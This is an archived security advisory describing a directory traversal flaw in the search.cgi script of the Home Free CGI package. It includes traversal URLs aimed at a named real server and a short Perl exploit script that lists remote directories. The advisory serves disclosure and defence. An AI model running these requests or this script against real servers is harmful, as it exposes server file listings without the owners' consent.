Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: httpd81.htm

Search.cgi Directory traversal vulnerability



Vulnerability

    search.cgi

Affected

    SolutionScripts.com Home Free CGI package

Description

    Following   is    based   on    #!/bin/csh   security    advisory.
    SolutionScripts.com  is  a  vendor  of  Perl  CGI  scripts for all
    platforms that  support the  language (WinNT,  Linux, various Unix
    flavors).   Home  Free  is  a  package  developed  and marketed by
    SolutionScripts.com, below is an extract from their website.

        "Home  Free  is  the  ultimate  community  building   program.
        Allowing you  to give  your visitors  a free  web site on your
        server.  With complete control over every aspect of your  free
        web site program, you can  grow page views, revenue and  brand
        awareness for your site."

        http://solutionscripts.com/vault/homefree/index.shtml

    Home Free is used  by many popular websites.   It allows users  to
    set up and maintain their websites through a series of CGI scripts
    without posing a threat to system security.  Home Free consists of
    the following files from an end-user point of view:

        ./features.cgi
        ./new.cgi
        ./search.cgi
        ./signup.cgi
        ./user_files.cgi
        ./user_formmail.cgi
        ./user_ftp_import.cgi
        ./user_gbook.cgi
        ./user_manage.cgi
        ./user_pref.cgi
        ./user_uploads.cgi
        ./user_wwwboard.cgi

    There are also  various 'admin' CGI  scripts in the  package, such
    as:

        ./admin.cgi
        ./admin_browse.cgi
        ./admin_cata.cgi
        ./admin_email.cgi
        ./admin_features.cgi
        ./admin_setup.cgi
        ./admin_update.cgi

    The search.cgi script uses the following input variables:

        letter=any string
        cata=any string
        perpage=any string
        start=any string
        boolean=or/and
        advanced

    This CGI script can be exploited to view directory listings on the
    host  server.   A  vulnerability  exists  because  of insufficient
    bounds checking  of the  'letter' variable  when it  is parsed  by
    the search.cgi script, for example:

        http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt

    The above URL  will list the  \winnt directory of  the host.   The
    search.cgi script also  seems to read  and display the  first line
    of  each  file  (network.wri,  et  al).   Those  who  found   this
    vulnerability have  been unable  to use  the search.cgi  script or
    any of the other scripts in the package to view files to date.

    You can  also exploit  the vulnerability  to view  other directory
    listings, such as the /cgi-bin directory under Apache.

        http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin

    #!/bin/csh also took  the time in  writing a short  Perl script to
    display the directory listings of vulnerable servers:

    #!/usr/bin/perl
    #
    # Quick exploit of the Home Free ./search.cgi script, allows you to list
    # directories on the host.
    #
    # Default server is antionline's, change as appropriate.
    #
    
    use IO::Socket;
    
    if ($ARGV[0] eq "") { die "no argument\n"; }
    
    $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                  PeerAddr  => "members.antionline.com",
                                  PeerPort  => 80) ||
                    die "can't connect to host: $!";
    
    select($asoc);
    $| = 1;
    
    print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";
    
    while(<$asoc>) {
            if ($_ =~ /.+HREF.+TD.+/) {
                    @parts = split("\"", $_);
                    $foo = $parts[1];
                    @parts = split("/", $foo);
                    print STDOUT $parts[3];
                    print STDOUT "\n";
            }
    }
    close(ASOC);

    Other smaller  problems were  identified when  testing the  bounds
    checking  and   flexibility  of   the  other   scripts,  such   as
    user_manage.cgi.  Without  access to the  source code of  the Perl
    scripts in  question, it  is very  difficult to  know the security
    implications of such problems.

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH